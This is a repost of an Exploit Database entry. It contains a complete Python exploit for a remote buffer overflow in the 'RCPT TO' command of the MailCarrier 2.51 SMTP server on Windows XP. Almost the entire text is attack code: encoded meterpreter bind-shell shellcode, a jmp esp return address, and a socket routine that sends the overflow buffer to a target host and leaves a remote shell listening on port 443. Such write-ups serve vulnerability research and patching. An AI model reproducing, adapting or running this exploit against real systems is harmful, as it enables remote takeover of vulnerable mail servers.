MailCarrier 2.51 – ‘RCPT TO’ Buffer Overflow

• Exploit Database
• 13 阅读

• 作者： Dino Covotsos
  日期： 2019-04-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46695/

• #!/usr/bin/python
  # Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
  # Date: 12/04/2019
  # Exploit Author: Dino Covotsos - Telspace Systems
  # Vendor Homepage: https://www.tabslab.com/
  # Version: 2.51
  # Software Link: N.A
  # Contact: services[@]telspace.co.za
  # Twitter: @telspacesystems (Greets to the Telspace Crew)
  # Tested on: Windows XP Prof SP3 ENG x86
  # CVE: TBC from Mitre
  # Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
  #0x7e4456f7 : jmp esp |{PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
  #POC
  #1.) Change ip and port in code
  #2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
  import sys
  import socket
  import time
  
  #msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
  shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
  "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
  "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
  "\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
  "\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
  "\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
  "\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
  "\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
  "\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
  "\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
  "\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
  "\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
  "\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
  "\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
  "\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
  "\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
  "\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
  "\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
  "\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
  "\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
  "\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
  "\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
  "\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
  "\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
  "\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
  "\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
  "\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
  "\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
  "\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
  "\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
  "\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
  "\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
  "\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
  "\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
  "\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
  "\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
  "\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
  "\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
  "\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
  "\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
  "\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
  "\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
  "\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
  "\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
  "\x6f\x58\x55\x41\x41")
  
  buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
  
  print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  connect=s.connect(("192.168.0.150", 25))
  print s.recv(1024)
  s.send('EHLO root@telspace.co.za \r\n')
  print s.recv(1024)
  s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
  print s.recv(1024)
  s.send('RCPT TO: '+ buffer + '\r\n')
  print s.recv(1024)
  s.send('QUIT\r\n')
  s.close()
  time.sleep(1)
  print "[*] Done, but if you get here the exploit failed!"